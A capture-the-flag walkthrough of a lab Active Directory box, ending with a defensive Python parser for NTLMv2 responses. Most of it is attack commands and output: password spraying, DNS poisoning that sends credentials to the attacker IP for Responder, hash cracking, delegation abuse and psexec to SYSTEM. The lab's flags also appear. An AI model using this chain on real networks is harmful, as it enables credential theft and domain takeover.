Proof of Concept
10.129.95.154
Nmap
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Information Gathering
Collect host information
┌──(kali㉿kali)-[~/Intelligence]
└─$ nxc smb 10.129.95.154 --generate-hosts-file hosts
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat hosts
10.129.95.154 DC.intelligence.htb intelligence.htb DC
Configure the /etc/hosts file
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.95.154 DC.intelligence.htb intelligence.htb DC
Initial Access
Directory enumeration of the web service on port 80 shows PDF files under the /documents directory
┌──(kali㉿kali)-[~/Intelligence]
└─$ feroxbuster -u http://intelligence.htb -t 100 -s 200 -w /usr/share/dirb/wordlists/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://intelligence.htb/
🚩 In-Scope Url │ intelligence.htb
🚀 Threads │ 100
📖 Wordlist │ /usr/share/dirb/wordlists/common.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 209l 800w 48542c http://intelligence.htb/documents/2020-12-15-upload.pdf
200 GET 7l 1031w 84152c http://intelligence.htb/documents/bootstrap.bundle.min.js
200 GET 106l 659w 26989c http://intelligence.htb/documents/demo-image-01.jpg
200 GET 56l 165w 1850c http://intelligence.htb/documents/scripts.js
200 GET 208l 768w 47856c http://intelligence.htb/documents/2020-01-01-upload.pdf
200 GET 1l 44w 2532c http://intelligence.htb/documents/jquery.easing.min.js
200 GET 8l 29w 28898c http://intelligence.htb/documents/favicon.ico
200 GET 2l 1297w 89476c http://intelligence.htb/documents/jquery.min.js
200 GET 492l 2733w 186437c http://intelligence.htb/documents/demo-image-02.jpg
200 GET 10345l 19793w 190711c http://intelligence.htb/documents/styles.css
<SNIP>
Write a Python script that brute-forces the date-based PDF filenames and prints the contents of each file found
import io
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import date, timedelta

import pdfplumber
import requests

BASE_URL = "http://intelligence.htb/documents"
START_DATE = date(2018, 1, 1)
END_DATE = date(2023, 12, 31)


def check(d):
    """Request <date>-upload.pdf; return (url, text) if the file exists, else None."""
    url = f"{BASE_URL}/{d.strftime('%Y-%m-%d')}-upload.pdf"
    try:
        r = requests.get(url, timeout=5)
        if r.status_code == 200:
            with pdfplumber.open(io.BytesIO(r.content)) as pdf:
                text = "\n".join(page.extract_text() or "" for page in pdf.pages)
            return url, text
    except Exception:
        pass  # connection errors and unparseable PDFs are skipped
    return None


# One candidate filename per day in the date range
dates = [START_DATE + timedelta(days=i) for i in range((END_DATE - START_DATE).days + 1)]

with ThreadPoolExecutor(max_workers=50) as ex:
    for future in as_completed([ex.submit(check, d) for d in dates]):
        if res := future.result():
            url, text = res
            print(f"\n{'=' * 60}")
            print(f"[{url}]")
            print(text)
Run the Python script
┌──(kali㉿kali)-[~/Intelligence]
└─$ python find_pdfs.py | tee find_pdfs_string.txt
============================================================
[http://intelligence.htb/documents/2020-01-01-upload.pdf]
Dolore ut etincidunt adipisci aliquam labore.
Dolore quaerat porro neque amet. Non ipsum quiquia ut dolor modi porro.
Magnam dolor dolor etincidunt magnam adipisci etincidunt magnam. Aliquam
eius ipsum sed amet dolorem voluptatem. Dolore tempora magnam tempora
est ipsum. Modi etincidunt consectetur porro numquam eius magnam velit.
Est consectetur non tempora velit sed labore. Velit sed labore voluptatem est
tempora. Magnam etincidunt consectetur sed dolorem amet labore.
Adipisciesteiusvoluptatem. Adipisciseddoloremutetinciduntnonetincidunt
numquam. Quisquam sit tempora voluptatem. Numquam ut dolore consecte-
tur dolor quaerat quisquam. Tempora dolorem dolore dolore etincidunt modi.
Magnamaliquamquisquamporro. Modiestutnumquamdolordoloremneque.
============================================================
[http://intelligence.htb/documents/2020-01-02-upload.pdf]
Adipisci dolor eius porro.
Voluptatem neque modi consectetur magnam sit. Eius ut sit velit quaerat. Est
labore est amet consectetur amet voluptatem etincidunt. Ut aliquam magnam
<SNIP>
Found the default password in one of the PDF files
- NewIntelligenceCorpUser9876
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat find_pdfs_string.txt | grep -i passw -A 5 -B 5
============================================================
[http://intelligence.htb/documents/2020-06-04-upload.pdf]
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
============================================================
[http://intelligence.htb/documents/2020-07-20-upload.pdf]
Adipisci etincidunt labore ipsum magnam numquam
ut aliquam.
Create the PDF list file
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat find_pdfs_string.txt | grep pdf | sed 's/\[//' | sed 's/\]//' > pdf_list.txt
Write a shell script that downloads all of the PDF files
┌──(kali㉿kali)-[~/Intelligence/pdfs]
└─$ cat pdf_list.txt
#!/bin/bash
wget http://intelligence.htb/documents/2020-01-01-upload.pdf
wget http://intelligence.htb/documents/2020-01-02-upload.pdf
wget http://intelligence.htb/documents/2020-01-23-upload.pdf
wget http://intelligence.htb/documents/2020-02-17-upload.pdf
wget http://intelligence.htb/documents/2020-01-20-upload.pdf
wget http://intelligence.htb/documents/2020-01-22-upload.pdf
wget http://intelligence.htb/documents/2020-01-25-upload.pdf
wget http://intelligence.htb/documents/2020-02-11-upload.pdf
wget http://intelligence.htb/documents/2020-01-10-upload.pdf
<SNIP>
Run the shell script
┌──(kali㉿kali)-[~/Intelligence/pdfs]
└─$ ./pdf_list.txt
--2026-02-21 03:52:53-- http://intelligence.htb/documents/2020-01-01-upload.pdf
Resolving intelligence.htb (intelligence.htb)... 10.129.95.154
Connecting to intelligence.htb (intelligence.htb)|10.129.95.154|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26835 (26K) [application/pdf]
Saving to: ‘2020-01-01-upload.pdf’
<SNIP>
Extract the Creator field from every downloaded PDF to build a user list
┌──(kali㉿kali)-[~/Intelligence/pdfs]
└─$ exiftool *.pdf | grep Creator | cut -d ':' -f 2 | sed 's/ //' > ../userlist.txt
Password spraying with the previously discovered password succeeds for the user Tiffany.Molina
- Tiffany.Molina:NewIntelligenceCorpUser9876
┌──(kali㉿kali)-[~/Intelligence]
└─$ nxc smb intelligence.htb -u userlist.txt -p 'NewIntelligenceCorpUser9876' -t 100
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
<SNIP>
SMB 10.129.95.154 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
As Tiffany.Molina, the Users and IT shares are readable
┌──(kali㉿kali)-[~/Intelligence]
└─$ nxc smb intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --shares
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB 10.129.95.154 445 DC [*] Enumerated shares
SMB 10.129.95.154 445 DC Share Permissions Remark
SMB 10.129.95.154 445 DC ----- ----------- ------
SMB 10.129.95.154 445 DC ADMIN$ Remote Admin
SMB 10.129.95.154 445 DC C$ Default share
SMB 10.129.95.154 445 DC IPC$ READ Remote IPC
SMB 10.129.95.154 445 DC IT READ
SMB 10.129.95.154 445 DC NETLOGON READ Logon server share
SMB 10.129.95.154 445 DC SYSVOL READ Logon server share
SMB 10.129.95.154 445 DC Users READ
Connect to the Users share
┌──(kali㉿kali)-[~/Intelligence]
└─$ smbclient //intelligence.htb/Users/ -U 'Tiffany.Molina' NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
cd
3770367 blocks of size 4096. 1451256 blocks available
Found user.txt in Users\Tiffany.Molina\Desktop
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Sat Feb 21 09:33:45 2026
Read user.txt
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ cat user.txt
56463cebe9f099423d6e3e259616b76b
Lateral Movement (auth as TED.GRAVES)
Found downdetector.ps1 in the IT share
┌──(kali㉿kali)-[~/Intelligence]
└─$ smbclient //intelligence.htb/IT/ -U 'Tiffany.Molina' NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1454813 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
Reviewing downdetector.ps1 shows that it runs a web service health check every 5 minutes. It reads DNS records through the LDAP (AD:) drive and requests every host whose name starts with "web" using -UseDefaultCredentials, so the account running the scheduled task authenticates to whatever host those records resolve to; an attacker who controls such a record can capture its credentials with Responder.
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if($request.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
Register a fake DNS record pointing at the attacker IP using dnstool.py
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ python dnstool.py -u 'intelligence\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -r webapp -a add -t A -d 10.10.14.221 DC.intelligence.htb -dc-ip 10.129.95.154 -dns-ip 10.129.95.154
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Run Responder
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
<SNIP>
[+] Current Session Variables:
Responder Machine Name [WIN-F73QDZ7CCI1]
Responder Domain Name [HMSL.LOCAL]
Responder DCE-RPC Port [48475]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
Obtained the NTLMv2 hash of Ted.Graves
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ sudo responder -I tun0
<SNIP>
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:7586ed4ae64eb
Crack the captured hash to recover the plaintext password
- TED.GRAVES:Mr.Teddy
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt --quiet
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
TED.GRAVES::intelligence:7586ed4ae64eb877:3199c431726baca27c9aa7f94646889b:0101000000000000883a834c8fa3dc010b1e32d1e327e2cb000000000200080048004d0053004c0001001e00570049004e002d00460037003300510044005a00370043004300490031000400140048004d0053004c002e004c004f00430041004c0003003400570049004e002d00460037003300510044005a00370043004300490031002e0048004d0053004c002e004c004f00430041004c000500140048004d0053004c002e004c004f00430041004c0008003000300000000000000000000000002000002bf6ba424851e800419f386b98ec655b381f8736e3f80c09d3742377e1da2bb30a001000000000000000000000000000000000000900380048005400540050002f007700650062006100700070002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
SMB authentication succeeds as TED.GRAVES
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ nxc smb intelligence.htb -u 'TED.GRAVES' -p 'Mr.Teddy'
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [+] intelligence.htb\TED.GRAVES:Mr.Teddy
Lateral Movement (auth as SVC_INT$)
Collect BloodHound data
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ bloodhound-python -d 'intelligence.htb' -u 'TED.GRAVES' -p 'Mr.Teddy' -c All -ns 10.129.95.154 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: intelligence.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Testing resolved hostname connectivity dead:beef::213
INFO: Trying LDAP connection to dead:beef::213
INFO: Testing resolved hostname connectivity dead:beef::e581:8bdc:5bee:7427
INFO: Trying LDAP connection to dead:beef::e581:8bdc:5bee:7427
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to GC LDAP server: dc.intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Testing resolved hostname connectivity dead:beef::213
INFO: Trying LDAP connection to dead:beef::213
INFO: Testing resolved hostname connectivity dead:beef::e581:8bdc:5bee:7427
INFO: Trying LDAP connection to dead:beef::e581:8bdc:5bee:7427
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
INFO: Done in 00M 45S
INFO: Compressing output into 20260221191714_bloodhound.zip
Checked BloodHound and identified that user 'TED.GRAVES' is a member of the group "ITSUPPORT", which has "ReadGMSAPassword" rights on the user "SVC_INT$"
Enumerated GMSA passwords and obtained ‘SVC_INT$’ user’s NTLM hash
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ nxc ldap intelligence.htb -u 'TED.GRAVES' -p 'Mr.Teddy' --gmsa
LDAP 10.129.95.154 389 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:intelligence.htb)
LDAPS 10.129.95.154 636 DC [+] intelligence.htb\TED.GRAVES:Mr.Teddy
LDAPS 10.129.95.154 636 DC [*] Getting GMSA Passwords
LDAPS 10.129.95.154 636 DC Account: svc_int$ NTLM: d5538dca5ba2ff329c9df39ef130f439 PrincipalsAllowedToReadPassword: ['DC$', 'itsupport']
Authentication succeeds with the obtained NTLM hash
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ nxc smb intelligence.htb -u 'svc_int$' -H 'd5538dca5ba2ff329c9df39ef130f439'
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [+] intelligence.htb\svc_int$:d5538dca5ba2ff329c9df39ef130f439
Privilege Escalation
Checked BloodHound and identified that “SVC_INT$” has “AllowedToDelegate” rights on DC machine
Check delegated SPNs
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ impacket-findDelegation -dc-ip 10.129.95.154 'intelligence.htb/Ted.Graves:Mr.Teddy'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- ---------------------------------- ----------------------- ----------
DC$ Computer Unconstrained N/A Yes
svc_int$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition WWW/dc.intelligence.htb No
Request a service ticket for the delegated SPN, impersonating administrator
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ impacket-getST -spn 'www/dc.intelligence.htb' -impersonate 'administrator' -hashes :d5538dca5ba2ff329c9df39ef130f439 'intelligence.htb/svc_int$'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
Connect as Administrator using the issued ticket
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ export KRB5CCNAME=administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ impacket-psexec -k -no-pass administrator@dc.intelligence.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file eKbtwths.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service EtXX on dc.intelligence.htb.....
[*] Starting service EtXX.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Read root.txt
C:\Users\Administrator\Desktop> type root.txt
4543827a54c9b6561346141469382ce0
C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::213
IPv6 Address. . . . . . . . . . . : dead:beef::e581:8bdc:5bee:7427
Link-local IPv6 Address . . . . . : fe80::e581:8bdc:5bee:7427%6
IPv4 Address. . . . . . . . . . . : 10.129.95.154
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
10.129.0.1
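Returning to the NetNTLMv2 line Responder captured in the Lateral Movement section: the long blob after the NTProofStr is the client's NTLMv2_CLIENT_CHALLENGE, and its AV_PAIR list echoes the target information the DC (running downdetector.ps1) received from the host it authenticated to, which is why the names WIN-F73QDZ7CCI1 / HMSL.LOCAL from the Responder session variables and the SPN HTTP/webapp.intelligence.htb appear inside the hashcat line. The parser below is an added example, not part of the original writeup; it decodes that list from a hashcat -m 5600 line so a defender reviewing a logged or captured NTLMv2 response can see which host and service name the victim authenticated to and when. The line it parses is constructed here (dummy server challenge and NTProofStr; the name fields and the timestamp bytes mirror the capture above).

```python
import struct
from datetime import datetime, timedelta, timezone

# AvId values from MS-NLMP 2.2.2.1 (AV_PAIR); ids 1-5 and 9 carry UTF-16LE strings
AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
            4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags", 7: "MsvAvTimestamp",
            8: "MsvAvSingleHost", 9: "MsvAvTargetName", 10: "MsvAvChannelBindings"}
UTF16_AVS = {1, 2, 3, 4, 5, 9}


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_av_pairs(blob: bytes) -> dict:
    """Decode the NTLMv2_CLIENT_CHALLENGE ('blob' after the NTProofStr): RespType(1)
    HiRespType(1) Reserved(6) TimeStamp(8) ClientChallenge(8) Reserved(4) AV_PAIR list."""
    if len(blob) < 28 or blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2 client challenge")
    info = {"timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0])}
    off = 28
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        value = blob[off + 4:off + 4 + av_len]
        if len(value) != av_len:
            raise ValueError("truncated AV_PAIR")
        off += 4 + av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            return info
        name = AV_NAMES.get(av_id, f"MsvAvUnknown_{av_id}")
        info[name] = value.decode("utf-16-le") if av_id in UTF16_AVS else value.hex()
    raise ValueError("AV_PAIR list not terminated by MsvAvEOL")


def parse_hashcat_5600(line: str) -> dict:
    """Split a hashcat -m 5600 line (USER::DOMAIN:ServerChallenge:NTProofStr:blob[:password])
    and decode the target info the client echoed back inside the blob."""
    fields = line.strip().split(":")
    if len(fields) < 6 or fields[1] != "":
        raise ValueError("unexpected NetNTLMv2 line layout")
    user, _, domain, server_challenge, ntproofstr, blob_hex = fields[:6]
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "ntproofstr": ntproofstr, "target_info": parse_av_pairs(bytes.fromhex(blob_hex))}


def _av(av_id: int, value) -> bytes:
    """Encode one AV_PAIR; str values are written as UTF-16LE."""
    data = value.encode("utf-16-le") if isinstance(value, str) else value
    return struct.pack("<HH", av_id, len(data)) + data


def build_sample_line() -> str:
    """Constructed sample, not the real capture: dummy server challenge and NTProofStr,
    the capture's timestamp bytes, and a target-info list mirroring the names seen above."""
    header = (bytes([1, 1]) + bytes(6) + bytes.fromhex("883a834c8fa3dc01")
              + bytes.fromhex("0b1e32d1e327e2cb") + bytes(4))
    blob = (header + _av(2, "HMSL") + _av(1, "WIN-F73QDZ7CCI1") + _av(4, "HMSL.LOCAL")
            + _av(3, "WIN-F73QDZ7CCI1.HMSL.LOCAL") + _av(5, "HMSL.LOCAL") + _av(10, bytes(16))
            + _av(9, "HTTP/webapp.intelligence.htb") + _av(0, b""))
    return f"TED.GRAVES::intelligence:{'11' * 8}:{'22' * 16}:{blob.hex()}"
```

Calling parse_hashcat_5600(build_sample_line())["target_info"] yields MsvAvTargetName "HTTP/webapp.intelligence.htb", MsvAvDnsComputerName "WIN-F73QDZ7CCI1.HMSL.LOCAL" and a February 2026 timestamp; the same call on the real hashcat line from the capture decodes the actual values the DC sent.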